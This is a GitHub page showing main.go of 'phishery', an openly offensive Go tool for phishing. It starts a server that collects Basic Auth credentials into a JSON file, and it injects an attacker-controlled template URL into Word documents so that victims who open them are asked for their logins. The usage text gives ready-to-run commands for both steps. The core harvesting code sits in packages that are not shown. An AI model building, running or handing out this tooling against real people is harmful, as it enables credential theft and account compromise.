-
Notifications
You must be signed in to change notification settings - Fork 205
/
main.go
108 lines (90 loc) · 3.08 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
package main
import (
"flag"
"fmt"
"os"
"os/signal"
"syscall"
"github.com/ryhanson/phishery/badocx"
"github.com/ryhanson/phishery/neatprint"
"github.com/ryhanson/phishery/phish"
)
const usage = `|\ \\\\__ O __ _ __
| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __
> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /
|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, /
/_/ Basic Auth Credential Harvester (____/
with Word Doc Template Injector
Start the server : phishery -s settings.json -c credentials.json
Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
Options:
-h, --help Show usage and exit.
-v Show version and exit.
-s The JSON settings file used to setup the server. [default: "settings.json"]
-c The JSON file to store harvested credentials. [default: "credentials.json"]
-u The phishery URL to use as the Word document template.
-i The Word .docx file to inject with a template URL.
-o The new Word .docx file with the injected template URL.
-k Disable TLS support.
`
var neat = neatprint.NewNeatPrint()
func main() {
var (
flVersion = flag.Bool("v", false, "")
flSettings = flag.String("s", "settings.json", "")
flCredentials = flag.String("c", "credentials.json", "")
flUrl = flag.String("u", "", "")
flDocx = flag.String("i", "", "")
flBadocx = flag.String("o", "", "")
flIsCleartext = flag.Bool("k", false, "")
)
flag.Usage = func() { fmt.Print(usage) }
flag.Parse()
if *flVersion {
neat.Info("phishery version: " + phish.VERSION)
os.Exit(0)
}
if *flDocx != "" || *flUrl != "" || *flBadocx != "" {
createBadocx(*flUrl, *flDocx, *flBadocx)
}
c := make(chan os.Signal, 2)
signal.Notify(c, os.Interrupt, syscall.SIGTERM)
go func() {
<-c
fmt.Println()
neat.Event("Stopping auth server...")
os.Exit(1)
}()
err := phish.StartPhishery(*flSettings, *flCredentials, *flIsCleartext)
if err != nil {
neat.Error("Error starting Phishery server: %s", err)
os.Exit(1)
}
}
func createBadocx(url string, in string, out string) {
if url == "" || in == "" || out == "" {
neat.Error("Word .docx files and URL are required!")
neat.Info("Usage: phishery -u https://secure.site.local/docs -i good.docx -o bad.docx")
os.Exit(0)
}
neat.Event("Opening Word document: %s", in)
wordDocx, err := badocx.OpenDocx(in)
if err != nil {
neat.Error("Error opening word document: %s", err.Error())
os.Exit(1)
}
neat.Event("Setting Word document template to: %s", url)
wordDocx.SetTemplate(url)
neat.Event("Saving injected Word document to: %s", out)
if err := wordDocx.WriteBadocx(out); err != nil {
neat.Error("Error injecting Word doc: %s", err)
os.Exit(1)
}
if err := wordDocx.Close(); err != nil {
neat.Error("Error closing injected Word doc: %s", err)
os.Exit(1)
}
neat.Info("Injected Word document has been saved!")
os.Exit(0)
}